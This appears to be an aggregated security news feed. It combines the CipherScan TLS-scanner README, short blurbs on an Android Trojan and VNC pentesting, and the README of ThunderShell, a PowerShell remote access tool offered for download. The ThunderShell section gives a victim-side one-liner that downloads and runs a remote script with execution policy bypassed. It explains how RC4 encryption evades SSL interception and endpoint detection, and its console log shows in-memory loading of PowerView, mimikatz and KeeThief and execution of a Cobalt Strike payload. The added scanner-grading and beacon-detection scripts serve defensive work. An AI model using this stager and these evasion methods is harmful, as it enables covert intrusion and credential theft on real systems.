CipherScan – Find out which SSL ciphersuites are supported by a target

Cipherscan tests the ordering of the SSL/TLS ciphers on a given target, for all major versions of SSL and TLS. It also extracts some certificate information, TLS options, OCSP stapling and more. Cipherscan is a wrapper above the openssl s_client command line.

Cipherscan is meant to run on all flavors of unix. It ships with its own build of OpenSSL for Linux/64 and Darwin/64. On other platforms, it will use the openssl version provided by the operating system (which may have limited cipher support), or your own version provided in the -o command line flag.

Examples

Basic test:

$ ./cipherscan google.com
..................
Target: google.com:443

prio  ciphersuite                   protocols                      pfs                 curves
1     ECDHE-RSA-CHACHA20-POLY1305   TLSv1.2                        ECDH,P-256,256bits  prime256v1
2     ECDHE-RSA-AES128-GCM-SHA256   TLSv1.2                        ECDH,P-256,256bits  prime256v1
3     ECDHE-RSA-AES128-SHA          TLSv1.1,TLSv1.2                ECDH,P-256,256bits  prime256v1
4     ECDHE-RSA-RC4-SHA             SSLv3,TLSv1,TLSv1.1,TLSv1.2    ECDH,P-256,256bits  prime256v1
5     AES128-GCM-SHA256             TLSv1.2                        None                None
6     AES128-SHA256                 TLSv1.2                        None                None
7     AES128-SHA                    TLSv1.1,TLSv1.2                None                None
8     RC4-SHA                       SSLv3,TLSv1,TLSv1.1,TLSv1.2    None                None
9     RC4-MD5                       SSLv3,TLSv1,TLSv1.1,TLSv1.2    None                None
10    ECDHE-RSA-AES256-GCM-SHA384   TLSv1.2                        ECDH,P-256,256bits  prime256v1
11    ECDHE-RSA-AES256-SHA384       TLSv1.2                        ECDH,P-256,256bits  prime256v1
12    ECDHE-RSA-AES256-SHA          SSLv3,TLSv1,TLSv1.1,TLSv1.2    ECDH,P-256,256bits  prime256v1
13    AES256-GCM-SHA384             TLSv1.2                        None                None
14    AES256-SHA256                 TLSv1.2                        None                None
15    AES256-SHA                    SSLv3,TLSv1,TLSv1.1,TLSv1.2    None                None
16    ECDHE-RSA-AES128-SHA256       TLSv1.2                        ECDH,P-256,256bits  prime256v1
17    ECDHE-RSA-DES-CBC3-SHA        SSLv3,TLSv1,TLSv1.1,TLSv1.2    ECDH,P-256,256bits  prime256v1
18    DES-CBC3-SHA                  SSLv3,TLSv1,TLSv1.1,TLSv1.2    None                None

Certificate: trusted, 2048 bit, sha1WithRSAEncryption signature
TLS ticket lifetime hint: 100800
OCSP stapling: not supported
Cipher ordering: server

Testing STARTTLS:

darwin$ ./cipherscan --curves -starttls xmpp jabber.ccc.de:5222
..............................
Target: jabber.ccc.de:5222

prio  ciphersuite                   protocols                      pfs                 curves
1     ECDHE-RSA-AES256-GCM-SHA384   TLSv1.2                        ECDH,P-256,256bits  prime256v1
2     ECDHE-RSA-AES256-SHA384       TLSv1.2                        ECDH,P-256,256bits  prime256v1
3     ECDHE-RSA-AES256-SHA          TLSv1,TLSv1.1,TLSv1.2          ECDH,P-256,256bits  prime256v1
4     DHE-RSA-AES256-GCM-SHA384     TLSv1.2                        DH,1024bits         None
5     DHE-RSA-AES256-SHA256         TLSv1.2                        DH,1024bits         None
6     DHE-RSA-AES256-SHA            TLSv1,TLSv1.1,TLSv1.2          DH,1024bits         None
7     DHE-RSA-CAMELLIA256-SHA       TLSv1,TLSv1.1,TLSv1.2          DH,1024bits         None
8     AES256-GCM-SHA384             TLSv1.2                        None                None
9     AES256-SHA256                 TLSv1.2                        None                None
10    AES256-SHA                    TLSv1,TLSv1.1,TLSv1.2          None                None
11    CAMELLIA256-SHA               TLSv1,TLSv1.1,TLSv1.2          None                None
12    ECDHE-RSA-AES128-GCM-SHA256   TLSv1.2                        ECDH,P-256,256bits  prime256v1
13    ECDHE-RSA-AES128-SHA256       TLSv1.2                        ECDH,P-256,256bits  prime256v1
14    ECDHE-RSA-AES128-SHA          TLSv1,TLSv1.1,TLSv1.2          ECDH,P-256,256bits  prime256v1
15    DHE-RSA-AES128-GCM-SHA256     TLSv1.2                        DH,1024bits         None
16    DHE-RSA-AES128-SHA256         TLSv1.2                        DH,1024bits         None
17    DHE-RSA-AES128-SHA            TLSv1,TLSv1.1,TLSv1.2          DH,1024bits         None
18    DHE-RSA-SEED-SHA              TLSv1,TLSv1.1,TLSv1.2          DH,1024bits         None
19    DHE-RSA-CAMELLIA128-SHA       TLSv1,TLSv1.1,TLSv1.2          DH,1024bits         None
20    AES128-GCM-SHA256             TLSv1.2                        None                None
21    AES128-SHA256                 TLSv1.2                        None                None
22    AES128-SHA                    TLSv1,TLSv1.1,TLSv1.2          None                None
23    SEED-SHA                      TLSv1,TLSv1.1,TLSv1.2          None                None
24    CAMELLIA128-SHA               TLSv1,TLSv1.1,TLSv1.2          None                None

Certificate: UNTRUSTED, 2048 bit, sha1WithRSAEncryption signature
TLS ticket lifetime hint: None
OCSP stapling: not supported
Cipher ordering: client
Curves ordering: server
Curves fallback: False

Exporting to JSON with the -j command line option:

$ ./cipherscan --curves -j www.ebay.com | j
{
  "curves_fallback": "False",
  "serverside": "True",
  "target": "www.ebay.com:443",
  "utctimestamp": "2015-04-03T14:54:31.0Z",
  "ciphersuite": [
    {
      "cipher": "AES256-SHA",
      "ocsp_stapling": "False",
      "pfs": "None",
      "protocols": [ "TLSv1", "TLSv1.1", "TLSv1.2" ],
      "pubkey": [ "2048" ],
      "sigalg": [ "sha1WithRSAEncryption" ],
      "ticket_hint": "None",
      "trusted": "True"
    },
    {
      "cipher": "ECDHE-RSA-DES-CBC3-SHA",
      "curves": [ "prime256v1", "secp384r1", "secp224r1", "secp521r1" ],
      "curves_ordering": "server",
      "ocsp_stapling": "False",
      "pfs": "ECDH,P-256,256bits",
      "protocols": [ "TLSv1", "TLSv1.1", "TLSv1.2" ],
      "pubkey": [ "2048" ],
      "sigalg": [ "sha1WithRSAEncryption" ],
      "ticket_hint": "None",
      "trusted": "True"
    }
  ]
}

Analyzing configurations

The motivation behind cipherscan is to help operators configure good TLS on their endpoints. To help this further, the script analyze.py compares the results of a cipherscan with the TLS guidelines from https://wiki.mozilla.org/Security/Server_Side_TLS and outputs a level and recommendations.

$ ./analyze.py -t jve.linuxwall.info
jve.linuxwall.info:443 has intermediate tls

Changes needed to match the old level:
* consider enabling SSLv3
* add cipher DES-CBC3-SHA
* use a certificate with sha1WithRSAEncryption signature
* consider enabling OCSP Stapling

Changes needed to match the intermediate level:
* consider enabling OCSP Stapling

Changes needed to match the modern level:
* remove cipher AES128-GCM-SHA256
* remove cipher AES256-GCM-SHA384
* remove cipher AES128-SHA256
* remove cipher AES128-SHA
* remove cipher AES256-SHA256
* remove cipher AES256-SHA
* disable TLSv1
* consider enabling OCSP Stapling

In the output above, analyze.py indicates that the target jve.linuxwall.info matches the intermediate configuration level. If the administrator of this site wants to reach the modern level, the items that failed under the modern tests should be corrected.

analyze.py does not make any assumption on what a good level should be. Site operators should know what level they want to match against, based on the compatibility level they want to support. Again, refer to https://wiki.mozilla.org/Security/Server_Side_TLS for more information.

Note on Nagios mode: analyze.py can be run as a nagios check with --nagios. The exit code will then represent the state of the configuration:
2 (critical) for bad tls
1 (warning) if it doesn't match the desired level
0 (ok) if it matches.

cipherscan can take more than 10 seconds to complete. To alleviate any timeout issues, you may want to run it outside of nagios, passing data through some temporary file.

OpenSSL

Cipherscan uses a custom release of openssl for linux 64 bits and darwin 64 bits. OpenSSL is built from a custom branch maintained by Peter Mosmans that includes a number of patches not merged upstream. It can be found here: https://github.com/PeterMosmans/openssl

You can build it yourself using the following commands:

git clone https://github.com/PeterMosmans/openssl.git --depth 1 -b 1.0.2-chacha
cd openssl
./Configure zlib no-shared experimental-jpake enable-md2 enable-rc5 \
enable-rfc3779 enable-gost enable-static-engine linux-x86_64
make depend
make
make report

The statically linked binary will be apps/openssl.

Contributors

Julien Vehent julien@linuxwall.info (original author)
Hubert Kario hkario@redhat.com (co-maintainer)
Pepi Zawodsky git@maclemon.at
Michael Zeltner m@niij.org
Peter Mosmans support@go-forward.net
Vincent Riquer v.riquer@b2f-concept.com
Christian Stadelmann dev@genodeftest.de
Simon Deziel simon.deziel@gmail.com
Aaron Zauner azet@azet.org
Mike mikedawg@gmail.com
Phil Cohen phlipper@users.noreply.github.com
Samuel Kleiner sam@firstbanco.com
Richard Soderberg https://twitter.com/floatingatoll
Adam Crosby adamcrosby@users.noreply.github.com

Download CipherScan
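The following is an added example, not cipherscan's own analyze.py, showing how the JSON that cipherscan -j writes can be graded against a level policy and turned into the Nagios exit codes described above (2 critical, 1 warning, 0 ok). The level rules in LEVELS are a deliberately reduced stand-in for the Mozilla Server Side TLS guideline checks and only model "remove cipher" / "disable protocol" / forward-secrecy findings; the input document is constructed in the shape of the www.ebay.com output above, with made-up hostname and values.

```python
"""Grade a cipherscan -j result and compute a Nagios-style exit code.

Added example, not cipherscan's analyze.py. LEVELS below is a simplified
policy (an assumption of this example, not the Mozilla guideline text).
"""
import json
import sys

# Constructed sample in the shape cipherscan -j emits; not a real scan.
SAMPLE_JSON = """
{
  "curves_fallback": "False",
  "serverside": "True",
  "target": "example.test:443",
  "utctimestamp": "2015-04-03T14:54:31.0Z",
  "ciphersuite": [
    {"cipher": "ECDHE-RSA-AES128-GCM-SHA256", "ocsp_stapling": "False",
     "pfs": "ECDH,P-256,256bits", "protocols": ["TLSv1.2"],
     "pubkey": ["2048"], "sigalg": ["sha256WithRSAEncryption"],
     "ticket_hint": "None", "trusted": "True"},
    {"cipher": "AES256-SHA", "ocsp_stapling": "False", "pfs": "None",
     "protocols": ["TLSv1", "TLSv1.1", "TLSv1.2"],
     "pubkey": ["2048"], "sigalg": ["sha256WithRSAEncryption"],
     "ticket_hint": "None", "trusted": "True"},
    {"cipher": "ECDHE-RSA-DES-CBC3-SHA", "ocsp_stapling": "False",
     "pfs": "ECDH,P-256,256bits", "protocols": ["TLSv1", "TLSv1.1", "TLSv1.2"],
     "pubkey": ["2048"], "sigalg": ["sha256WithRSAEncryption"],
     "ticket_hint": "None", "trusted": "True"}
  ]
}
"""

# Per level: cipher-name fragments and protocols that disqualify a scan,
# and whether every suite must offer forward secrecy. Illustrative only.
LEVELS = {
    "old": {"ciphers": ("EXP", "NULL", "ADH"), "protocols": {"SSLv2"}, "pfs": False},
    "intermediate": {"ciphers": ("EXP", "NULL", "ADH", "RC4", "MD5"),
                     "protocols": {"SSLv2", "SSLv3"}, "pfs": False},
    "modern": {"ciphers": ("EXP", "NULL", "ADH", "RC4", "MD5", "CBC3", "DES-CBC-"),
               "protocols": {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}, "pfs": True},
}
ORDER = ["old", "intermediate", "modern"]


def load_result(text):
    """Parse the JSON document written by cipherscan -j."""
    return json.loads(text)


def recommendations(result, level):
    """Return analyze.py-style change lines needed for `result` to reach `level`."""
    rules = LEVELS[level]
    seen_protocols = set()
    out = []
    for entry in result["ciphersuite"]:
        name = entry["cipher"]
        seen_protocols.update(entry["protocols"])
        if any(fragment in name for fragment in rules["ciphers"]):
            out.append("remove cipher " + name)
        elif rules["pfs"] and entry["pfs"] == "None":
            out.append("remove cipher " + name)  # suite offers no forward secrecy
    for proto in sorted(seen_protocols & rules["protocols"]):
        out.append("disable " + proto)
    if result["ciphersuite"]:
        first = result["ciphersuite"][0]  # cert and OCSP fields repeat per suite
        if first["trusted"] != "True":
            out.append("use a certificate the scanner's CA bundle trusts")
        if first["ocsp_stapling"] != "True":
            out.append("consider enabling OCSP Stapling")
    return out


def achieved_level(result):
    """Highest level with no blocking finding ("consider ..." lines are advisory)."""
    achieved = None
    for level in ORDER:
        blocking = [r for r in recommendations(result, level) if not r.startswith("consider")]
        if blocking:
            break
        achieved = level
    return achieved


def nagios_exit_code(result, desired):
    """2 (critical) for bad TLS, 1 (warning) when below `desired`, 0 (ok) otherwise."""
    achieved = achieved_level(result)
    if achieved is None:
        return 2
    return 0 if ORDER.index(achieved) >= ORDER.index(desired) else 1


def report(result):
    """Render the same layout analyze.py prints."""
    lines = ["%s has %s tls" % (result["target"], achieved_level(result) or "bad")]
    for level in ORDER:
        lines.append("")
        lines.append("Changes needed to match the %s level:" % level)
        lines.extend("* " + r for r in recommendations(result, level))
    return "\n".join(lines)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_JSON
    print(report(load_result(text)))
```

Run it with the path of a file produced by ./cipherscan -j host, or with no argument to grade the embedded sample. The sample lands on "intermediate" because the modern rules reject the non-PFS AES256-SHA suite, the 3DES suite and TLSv1/TLSv1.1; the exit code is 0 when intermediate is the desired level and 1 when modern is.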

Link: http://feedproxy.google.com/~r/PentestTools/~3/4y1FdVB4Ia8/cipherscan-find-out-which-ssl.html

A Trojan Disguised as a Keyboard App

A Trojan disguised as a keyboard app performs various operations on a user's device. Trustlook Labs discovered a Trojan taking advantage of the "su" command in a rooted Android device to perform malicious activities. The Trojan makes its way on to a device as a fake keyboard app named "AOSP keyboard." Once the user executes …

Link: https://blog.trustlook.com/2017/09/30/a-trojan-disguised-as-a-keyboard-app/

Barrett Lyon, Neustar – Startup Security Weekly #57

Barrett Lyon is the Vice President of Research and Development for the Neustar Security Solutions' portfolio. He spearheads the development of innovative new products and solutions for the company's industry-leading DDoS, DNS and cybersecurity solutions. He shows us how he does it all! Full Show Notes: visit http://securityweekly.com/category/ssw for all the latest episodes!
The post Barrett Lyon, Neustar – Startup Security Weekly #57 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/pPZvmjvwM5E/

ThunderShell – PowerShell based RAT

ThunderShell is a PowerShell based RAT that relies on HTTP requests to communicate. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network hooks.

Dependencies

apt install redis-server
apt install python-redis

Logs

Every error, HTTP request and command is logged in the logs folder.

How it works

Once the PowerShell script is executed, an HTTP request will be issued to the server. The body of each POST request contains the RC4 encrypted communication. Why RC4? Because it's strong enough to hide the traffic. The idea is to upload / download data over the network that cannot be inspected. The RAT supports HTTPS, but some security products may perform SSL interception and obtain visibility into your data, leading to detection of malicious payloads (PowerShell script, stager etc.). The RC4 encryption allows you to communicate over the wire without leaking your payload. The RC4 encryption also protects against endpoint agents that inspect traffic directly on the host; again, the traffic is decrypted at the "software" level, blocking detection at that level too.

To use the power of the tool there are some built-in functions, such as fetch, exec and upload, that allow you to run your payload quite easily.

Fetch flow

The server will fetch a resource (path, url)
Send the data over the RC4 encrypted channel
The PowerShell RAT will decrypt the payload
PowerShell executes the final payload

For example, if you fetch the PowerView.ps1 script it will be fully encrypted over the wire, avoiding detection since the server is proxying the request and fully encrypts the data.

Usage

Victim:

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://ringzer0team.com/PS-RemoteShell.ps1'); PS-RemoteShell -ip 1.1.1.1 -port 8080 -Key test -Delay 2000

Attacker side example:

default.json:
{
  "redis-host": "localhost",
  "redis-port": 6379,
  "http-host": "192.168.17.129",
  "http-port": 8080,
  "http-server": "Microsoft-IIS/7.5",
  "https-enabled": "off",
  "https-cert-path": "cert.pem",
  "encryption-key": "test",
  "max-output-timeout": 5
}

me@debian-dev:~$ python ThunderShell.py default.json
Thunder Shell 1.1 | Clients Server CLI
Mr.Un1k0d3r RingZer0 Team 2017
--------------------------------------------------------
[+] Starting web server on 192.168.17.129 port 8080
(Main)>>>
[+] Registering new shell 10.0.0.153:RingZer0\MrUn1k0d3r
[+] New shell ID 13 GUID is 4c05a17f-036a-4cd4-9446-da46281d5754
[-] is not a valid command
(Main)>>> help
Help Menu
-----------------------
 list      args (full)                     List all active shells
 interact  args (id)                       Interact with a session
 show      args (error/http/event, count)  Show error, http or event log (default number of rows 10)
 kill      args (id)                       Kill shell (clear db only)
 exit                                      Exit the application
 help                                      Show this help menu
(Main)>>> list
List of active shells
-----------------------
 4 x64 - 10.0.0.153:RingZer0\MrUn1k0d3r
 3 x64 - 10.0.0.153:RingZer0\MrUn1k0d3r
 2 x64 - 10.0.0.153:RingZer0\MrUn1k0d3r
 1 x64 - 10.0.0.153:RingZer0\MrUn1k0d3r
(Main)>>> list full
List of active shells
-----------------------
 4 x64 - 10.0.0.153:RingZer0\MrUn1k0d3r 2836ccdc-6747-45a4-8461-fa4022ac6bd0 last seen 13/09/2017 09:59:32
 3 x64 - 10.0.0.153:RingZer0\MrUn1k0d3r d09093a0-d3d7-4de9-b3a9-191ab7b2fef1 last seen 13/09/2017 09:54:31
 2 x64 - 10.0.0.153:RingZer0\MrUn1k0d3r 8d95e7c8-6868-4eb3-8ba8-231a1fdfcb92 last seen 13/09/2017 09:50:18
 1 x64 - 10.0.0.153:RingZer0\MrUn1k0d3r 90c608da-b64d-4d3a-9336-458e73658e49 last seen 12/09/2017 18:27:47
(Main)>>> interact 4
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> help
Shell Help Menu
-----------------------
 background                                Return to the main console
 refresh                                   Check for previous commands output
 fetch      args (path/url, command)       In memory execution of a script and execute a commmand
 exec       args (path/url)                In memory execution of code (shellcode)
 read       args (remote path)             Read a file on the remote host
 upload     args (path/url, path)          Upload a file on the remote system
 ps                                        List processes
 powerless  args (powershell)              Execute Powershell command without invoking Powershell
 inject     args (32/64, pid, command)     Inject command into a target process (max length 4096)
 alias      args (key, value)              Create an alias to avoid typing the same thing over and over
 delay      args (milliseconds)            Update the callback delay
 help                                      Show this help menu
List of built in alias
-----------------------
 powerup      PowerUp tool set
 wmiexec      Remote-WmiExecute utility
 searchevent  Search-EventForUser utility
 keethief     KeeThief tool set (Get-KeePassDatabaseKey)
 mimikatz     Invoke-Mimikatz utility
 inveigh      Invoke-Inveigh utility
 powerview    PowerView tool set
List user defined alias
-----------------------
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> whoami
RingZer0\MrUn1k0d3r
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> delay 0
Updating delay to 0
Delay is now 0
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> fetch powerview Get-NetLocalGroup -ComputerName 127.0.0.1
[+] Fetching https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
[+] Executing Get-NetLocalGroup -ComputerName 127.0.0.1
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> refresh
ComputerName : 127.0.0.1
AccountName  : 10-R90G3RLC-1GG/Administrator
IsDomain     : False
IsGroup      : False
SID          : S-1-5-21-
Description  : Built-in account for administering the computer/domain
PwdLastSet   : 8/11/2017 6:01:45 PM
PwdExpired   : False
UserFlags    : 66049
Disabled     : False
LastLogin    : 8/11/2017 5:58:47 PM
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> fetch https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-BrowserHomepage.ps1 Get-BrowserHomepage
[+] Fetching https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-BrowserHomepage.ps1
[+] Executing Get-BrowserHomepage
Start Page
----------
https://www.ringzer0team.com/
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> ps
 PID  Name                 Owner  CommandLine
 ---  ----                 -----  -----------
 0    System Idle Process
 4    System
 364  smss.exe
 492  csrss.exe
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> exec /home/attacker/cobaltstrike-reverse-https
[+] Fetching /home/attacker/cobaltstrike-reverse-https
[+] Payload should be executed shortly on the target
(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> background
(Main)>>> show http
Last 10 lines of log
-----------------------
192.168.17.1 (Wed Sep 13 17:09:42 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1
192.168.17.1 (Wed Sep 13 17:09:40 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1
192.168.17.1 (Wed Sep 13 17:09:38 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1
192.168.17.1 (Wed Sep 13 17:09:35 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1

Credit

Mr.Un1k0d3r RingZer0 Team 2017

Download ThunderShell
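The HTTP log excerpt above shows what this traffic looks like from the network side: repeated POSTs from one client to one server, to a bare "/?<GUID>" path, a few seconds apart, with an opaque body that TLS interception cannot make readable because of the inner RC4 layer. That shape is itself detectable. The following is an added detection example, not part of ThunderShell, that scores proxy records for exactly those two traits (a GUID-only query string and a near-constant beacon interval). It parses a constructed proxy-log format (timestamp client server method uri); the hosts and times are made up for the example, and parse_log() is the only part you would adapt to a real proxy or IDS export.

```python
"""Flag HTTP clients that POST to a GUID-style URI at regular intervals.

Added detection example, not ThunderShell code. The log format below is an
assumption: one record per line, "timestamp client server method uri".
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample records; the GUID query string mirrors the ThunderShell
# HTTP log excerpt above, everything else is made up for this example.
SAMPLE_LOG = """\
2017-09-13T17:09:35 10.0.0.153 192.168.17.129 POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088
2017-09-13T17:09:35 10.0.0.153 93.184.216.34 GET /index.html
2017-09-13T17:09:38 10.0.0.153 192.168.17.129 POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088
2017-09-13T17:09:40 10.0.0.153 192.168.17.129 POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088
2017-09-13T17:09:41 10.0.0.153 93.184.216.34 POST /login
2017-09-13T17:09:42 10.0.0.153 192.168.17.129 POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088
2017-09-13T17:09:44 10.0.0.153 192.168.17.129 POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088
2017-09-13T17:10:30 10.0.0.153 93.184.216.34 POST /login
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (GET|POST) (\S+)$")
# A path that is nothing but "/?" followed by a UUID is rare for real web apps.
GUID_URI_RE = re.compile(r"^/\?[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$")


def parse_log(text):
    """Return (timestamp, client, server, method, uri) tuples; skip bad lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # tolerate malformed lines rather than abort the run
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
        records.append((ts, m.group(2), m.group(3), m.group(4), m.group(5)))
    return records


def detect_beacons(records, min_count=4, max_cv=0.3):
    """Group POSTs by (client, server, uri) and flag regular or GUID-style ones.

    max_cv is the coefficient of variation (stdev / mean) of the gaps between
    requests; human browsing is bursty, a timer-driven callback is not.
    """
    groups = defaultdict(list)
    for ts, client, server, method, uri in records:
        if method == "POST":
            groups[(client, server, uri)].append(ts)
    findings = []
    for (client, server, uri), stamps in groups.items():
        if len(stamps) < min_count:
            continue  # too few samples to judge periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
        reasons = []
        if cv <= max_cv:
            reasons.append("regular_interval")
        if GUID_URI_RE.match(uri):
            reasons.append("guid_query")
        if reasons:
            findings.append({"client": client, "server": server, "uri": uri,
                             "count": len(stamps), "mean_interval": mean,
                             "cv": cv, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_beacons(parse_log(SAMPLE_LOG)):
        print("%(client)s -> %(server)s %(uri)s: %(count)d POSTs, "
              "mean gap %(mean_interval).2fs, cv %(cv).2f, %(reasons)s" % f)
```

On the sample the GUID group is flagged on both counts (five POSTs, mean gap 2.25 s, cv about 0.19), while the two /login POSTs never reach min_count. Two caveats follow from the README itself: once the operator runs "delay 0" the interval signal disappears and only the URI heuristic remains, and when "https-enabled" is on the URI is only visible at a TLS-terminating proxy.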

Link: http://feedproxy.google.com/~r/PentestTools/~3/wrbBYVaRYp4/thundershell-powershell-based-rat.html

VNC Penetration Testing

Welcome to internal penetration testing on VNC server, where you will learn VNC installation and configuration, enumeration and attack, system security and precaution. From Wikipedia: Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in…
The post VNC Penetration Testing appeared first on Hacking Articles.

Link: http://www.hackingarticles.in/vnc-penetration-testing/